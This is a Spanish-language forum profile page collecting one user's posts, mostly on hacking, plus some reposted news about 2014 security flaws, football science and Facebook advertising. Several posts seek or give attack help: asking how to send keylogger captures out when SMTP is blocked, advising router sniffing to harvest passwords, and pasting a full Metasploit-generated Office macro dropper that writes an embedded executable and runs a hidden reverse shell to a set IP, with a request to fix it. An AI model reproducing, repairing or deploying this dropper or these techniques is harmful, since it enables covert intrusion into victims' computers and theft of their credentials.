Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mister12

#151
Existe algún servicio en la nube, que me permita recibir archivos y datos utilizando la dirección IP para el envió.

Por poner un ejemplo, si utilizo un Keylogger, y no se me permite enviar los datos que el Keylogger a capturado a un correo electrónico, porque mi ISP tiene bloqueado el protocolo simple de transferencia de email (SMTP) y no me es posible enviar esos datos a mi ordenador personal, porque mi conexión a internet no es permanente.

Que método se podría utilizar en ese caso?

He buscado en google y no he encontrado nada
#152
Si ganas acceso aun router, algo más que puedes hacer es interceptar el trafico de todos los dispositivos conectados al router con un sniffer, con lo que obtendrías las contraseñas de los usuarios conectados a la red,  eso lo puedes hacer solo con conectarte a la red local algo más que puedes hacer Man-in-the-Middle attacks para ello debes crear Honeypots antes. Saludos
#153
Hacking / Re: Metasploit con TOR
2 Julio 2014, 22:13 PM
Cuando usas tor el unico trafico que pasa por tor, es el del navegaor que trae incorporado tor. Saludos
#154
Este es el error que me aparece al ejecutar el payload shell reverse tcp en formato vbs

Windows Script Host

Secuencia de comandos: C: ubicacion del payload
Linea:      24
Caracter: 13
Error:       Expected end of statement
Codigo:    800A0401
Origen:     Microsoft VBScript compilation error

El codigo fuente del vbs es este:

Citar'Created by msfpayload (http://www.metasploit.com).
'Payload: windows/shell/reverse_tcp
' Length: 290
'Options: {"LHOST"=>"197.186.55.5", "LPORT"=>"4441"}

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
   Iobcf12
End Sub
Sub Iobcf12()
   Dim Iobcf7 As Integer
   Dim Iobcf1 As String
   Dim Iobcf2 As String
   Dim Iobcf3 As Integer
   Dim Iobcf4 As Paragraph
   Dim Iobcf8 As Integer
   Dim Iobcf9 As Boolean
   Dim Iobcf5 As Integer
   Dim Iobcf11 As String
   Dim Iobcf6 As Byte
   Dim Kijfmicoeo as String
   Kijfmicoeo = "Kijfmicoeo"
   Iobcf1 = "URqWyDZMrNhdF.exe"
   Iobcf2 = Environ("USERPROFILE")
   ChDrive (Iobcf2)
   ChDir (Iobcf2)
   Iobcf3 = FreeFile()
   Open Iobcf1 For Binary As Iobcf3
   For Each Iobcf4 in ActiveDocument.Paragraphs
      DoEvents
         Iobcf11 = Iobcf4.Range.Text
      If (Iobcf9 = True) Then
         Iobcf8 = 1
         While (Iobcf8 < Len(Iobcf11))
            Iobcf6 = Mid(Iobcf11,Iobcf8,4)
            Put #Iobcf3, , Iobcf6
            Iobcf8 = Iobcf8 + 4
         Wend
      ElseIf (InStr(1,Iobcf11,Kijfmicoeo) > 0 And Len(Iobcf11) > 0) Then
         Iobcf9 = True
      End If
   Next
   Close #Iobcf3
   Iobcf13(Iobcf1)
End Sub
Sub Iobcf13(Iobcf10 As String)
   Dim Iobcf7 As Integer
   Dim Iobcf2 As String
   Iobcf2 = Environ("USERPROFILE")
   ChDrive (Iobcf2)
   ChDir (Iobcf2)
   Iobcf7 = Shell(Iobcf10, vbHide)
End Sub
Sub AutoOpen()
   Auto_Open
End Sub
Sub Workbook_Open()
   Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************


Kijfmicoeo
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&H59&H9E&H85&H54&H45&H90&H85&HDE&H59&H9E&H85&HB8&H46&H94&H85&HDC&H59&H9E&H85&HB8&H46&H9A&H85&HD4&H59&H9E&H85&HD7&H59&H9F&H85&H1E&H59&H9E&H85&H54&H51&HC3&H85&HDF&H59&H9E&H85&H83&H7A&HAE&H85&HFF&H59&H9E&H85&H10&H5F&H98&H85&HD6&H59&H9E&H85&H52&H69&H63&H68&HD7

Intente borrando el texto, que aparece en arteriscos y la codificación que aparece al final

Recopile el código en codeblock, para ver  cuál era la línea de código del error, solo logre ver que la línea 24 queda, donde aparece el texto en arteriscos al final pero no se cual es el carácter 13

Que parte del código debo modificar para que funcione?
#155
Gracias a ambos por sus respuestas. Saludos
#156
Seguridad / Re: ¿Alguein entro a mi red?
14 Junio 2014, 21:54 PM
Me imagino que usas algún router, y te conectas por medio de wifi, es la forma más fácil que alguien más puede entrar a tu red sin autorización, entra al panel de control de tu router y verifica cuales son las IP conectadas.
#157
Seguridad / Re: MALditas ventanas emergentes
14 Junio 2014, 21:50 PM
Verifica las extensiones y plugins que tienes instalados en el navegador, si no son de utilidad elimínalos, si el si no encuentras nada o no se soluciona el problema puedes usar una de estas herramientas: Adware-Removal-Tool, AdwCleaner, Hitman-Pro. Saludos
#158
El agregador de noticias Feedly se convirtió en la última de víctima de los hackers. La empresa informó que un ataque en la red impide a sus usuarios acceder a sus servicios.


Hackers impidieron a Evernote y a Feedly prestar sus servicios.

A través de su blog, la empresa informó que los perpetradores "están extorsionándonos para obtener dinero", solo así estarían dispuestos a revertir el daño que han causado. Pero los representantes de Feedly se negaron a pagar.

Algo muy similar le ocurrió al popular servicio de organización de información Evernote. No son los primeros ataques que llevan a cabo criminales cibernéticos que ocurren este año, y lo más probable es que tampoco sean los últimos.
A continuación, BBC Mundo le presenta tres de los más importantes que han tenido lugar en 2014.

Heartbleed

Las alarmas informáticas se activaron alrededor del 8 de abril. Expertos en seguridad cibernética advirtieron que se trataba de uno de los errores de programación (bug, en inglés) más peligrosos de los últimos años y recomendaron a los usuarios de internet cambiar sus contraseñas.
Heartbleed es una falla en el sistema que se utiliza para cifrar información personal que circula en la red y que puede incluir datos financieros y médicos. El rango de aspectos expuestos es amplio y difícil de determinar porque el error del software le permite a los atacantes ver parte de la información que se quedó en la memoria del servidor.
El mecanismo que protege los datos cuando pasan de un punto es conocido como SSL/TLS y es muy común, por lo que Google, Yahoo, Facebook, Tumblr, Amazon Web Services y otras importantes compañías que funcionan con este sistema, estuvieron en riesgo.


Las contraseñas de millones de usuarios estuvieron, y pueden seguir
estando en riesgo, con Heartbleed.

"17% de sitios web fueron atacados, lo que equivale a más de medio millón. Pero podrían ser muchos más, el problema en este caso es que el fallo puede producirse sin ser detectado porque quienes manejan los sitios web quizás no encontraron evidencia del ataque", le explicó a BBC Mundo Paul Mutton, de Netcraft, una empresa que ofrece servicios de seguridad informática.
Pocos días después de que se supo acerca de la amenaza de Heartbleed, el organismo impositivo canadiense, Canada Revenue Agency, reveló que el número de seguro social de 900 personas fue sustraído de sus sistemas.
Mientras que Mumsnet, un sitio web británico para madres, confirmó que contraseñas y mensajes personales enviados por sus miembros aparecieron en internet.

Goto fail

A mediados de abril Apple hizo pública una actualización de su sistema operativo OS X, porque descubrió que sus usuarios podrían ser víctimas de hackers al utilizar internet, en un caso similar al de Heartbleed.
El problema estaba en la conexión que se establece entre el navegador de Apple, Safari, y varios sitios web, entre los que se cuentan bancos, Google y Facebook. La gran mayoría de los websites cuenta con un sistema de seguridad que protege la información que circula en la red.
Pero este mecanismo quedó expuesto por la falla que afectó a los propietarios de modelos de iPhone, iPad, iPod y computadoras de Apple que funcionan con OS X.
"Al saber que existe este error, el atacante podría interceptar la comunicación entre los usuarios y los sitios web que visiten, robando sus contraseñas y nombres de usuarios. También podría volver a cifrar los datos obtenidos y distribuirlos como quisiera. Es lo que se conoce como el ataque del 'hombre en el medio'", le dijo a la publicación especializada MIT Technology Review Simson Garfinkel, experto en seguridad informática.


Los errores de las versiones de Internet Explorer que van del número
6 al 11 afectaron a quienes tienen Windows XP.

"Zero-day exploit" (CVE-2014-1776)

La seguridad y confiablidad de las diferentes versiones del navegador de Microsoft, Internet Explorer –que van desde la 6 hasta la 11- se pusieron en duda los últimos días de abril.
Un error de programación permitió que hackers pudieran tomar control de computadoras que funcionan con el sistema operativo Windows XP.
Para desespero de los usuarios, la falla, cuya existencia fue confirmada por la empresa de seguridad informática Symantec, "congelaba" la pantalla de quienes recurrían a Explorer para utilizar internet.
El sitio de estadísticas de tecnología en internet, NetMarket Share, calcula que más del 50% del mercado mundial de navegadores emplea Explorer.
Mientras que algunos especialistas estiman que alrededor de 30% de computadoras de escritorio utilizan Windows XP, lo que convierte a sus propietarios en potenciales víctimas.
Cambiar de navegador fue una de las principales opciones para disminuir el riesgo en el momento, recomendada incluso por el gobierno estadounidense. Con respecto al sistema operativo, una actualización podría ayudar.

http://www.bbc.co.uk/mundo/noticias/2014/06/140611_tecnologia_efectos_ataques_ciberneticos_kv.shtml
#159
¿Por qué España perdió frente a Holanda? Visión científica sobre el fútbol y el Mundial



¿Alguien puede explicar por qué España cayó de esa forma ante Holanda? Física, psicología, aerodinámica: les presentamos las mejores investigaciones científicas y descubrimientos relacionados con el fútbol en su conjunto y con el Mundial en concreto.

Caída de estrellas deportivas


Investigadores franceses, que publicaron su trabajo en la revista 'Psychological Science', descubrieron que un 'equipo de ensueño', formado por estrellas, a menudo muestra resultados mediocres. Su investigación fue importante no solo para el fútbol, sino también para los deportes de equipo, en particular, a lo referente con la Asociación Nacional de Baloncesto (NBA).

Los científicos afirman que las estrellas coordinan mal sus acciones, tienden a actuar por su cuenta, lo que resulta en un desastre para todo el equipo.

Según estos psicólogos franceses, es probable que los equipos formados por estrellas abandonen el Mundial en Brasil ya en el inicio. Sin embargo, los investigadores no especificaron qué equipos tenían en mente. Después de la humillante derrota de España frente a Holanda su idea queda más clara.

Juego browniano


Científicos japoneses, cuyo artículo fue publicado en la revista 'European Physical Journal B', demostraron que un partido de fútbol es similar al movimiento browniano, movimiento aleatorio de partículas muy pequeñas de materia bajo la influencia de las colisiones de las moléculas.

Primero en base teórica, y luego en la práctica, los científicos fueron capaces de demostrar que en el fútbol, como en el movimiento browniano, no se puede predecir nada después de unas pocas decenas de segundos.

Según los investigadores, esto muestra claramente la ventaja del fútbol sobre otros tipos de deportes: el hockey, el baloncesto, el béisbol, etc.

Brazuca en el túnel de viento


Investigadores australianos estudiaron las capacidades del balón oficial del Mundial, el Brazuca. Además, lo compararon con el Jabulani de Sudáfrica, ambos fabricados por Adidas.

Como resultado, ocurrió que la pelota anterior tenía una trayectoria imprevisible. Los investigadores metieron al Brazuca en el túnel de viento durante casi un mes y encontraron que es mucho más adecuado para el fútbol que su predecesor.

Según los científicos, las ranuras presentes en la superficie de Brazuca proporcionan coincidencia de la trayectoria del vuelo de la bola con la dirección del impacto. Así que ahora para los atacantes será más fácil dar en el blanco que antes.

http://actualidad.rt.com/deporte/view/131064-futbol-razon-perdida-espana-ciencia
#160
Facebook dio un paso más en la dirección de obtener beneficios comerciales aprovechándose de las vidas de sus usuarios y aseguró que permitirá a los anunciantes obtener datos de los hábitos de navegación en la red social.



Facebook acaba de anunciar que planea compartir los historiales de navegación de sus usuarios con las empresas anunciantes con el propósito de que la publicidad llegue con más efectividad a los internautas, informa el diario de negocios 'Wall Street Journal'.

"Lo que hemos escuchado de la gente es que quiere una publicidad dirigida más específicamente hacia ellos", dijo Brian Boland, vicepresidente de Facebook a cargo de los anuncios de marketing de producto. "El objetivo es dejarle claro a la gente por qué vio el anuncio", agregó.

Facebook permitirá a sus usuarios ver los expedientes de gustos e intereses que tiene sobre ellos y cambiar información contenida en esos archivos. Y si no le gusta el anuncio que le envían, el usuario también será capaz de elegir qué tipo de mensajes de marketing prefiere ver.

Los datos de los usuarios de la compañía, con sede en Silicon Valley, se basan principalmente en las actividades de la gente en su sitio, como por ejemplo darle 'Me gusta' a páginas de marcas o compartir un anuncio divertido. Los usuarios "quieren expectativas muy claras y quieren tener control sobre la publicidad que ven", destaca Brian Boland. 

Mientras tanto, los defensores de la privacidad expresaron su preocupación y varios pidieron que la Comisión Federal de Comercio examine la decisión. El acuerdo de Facebook con la Comisión requiere avisar a los consumidores y obtener el consentimiento antes de compartir información. 

http://actualidad.rt.com/sociedad/view/131072-facebook-venta-datos-personales-usuarios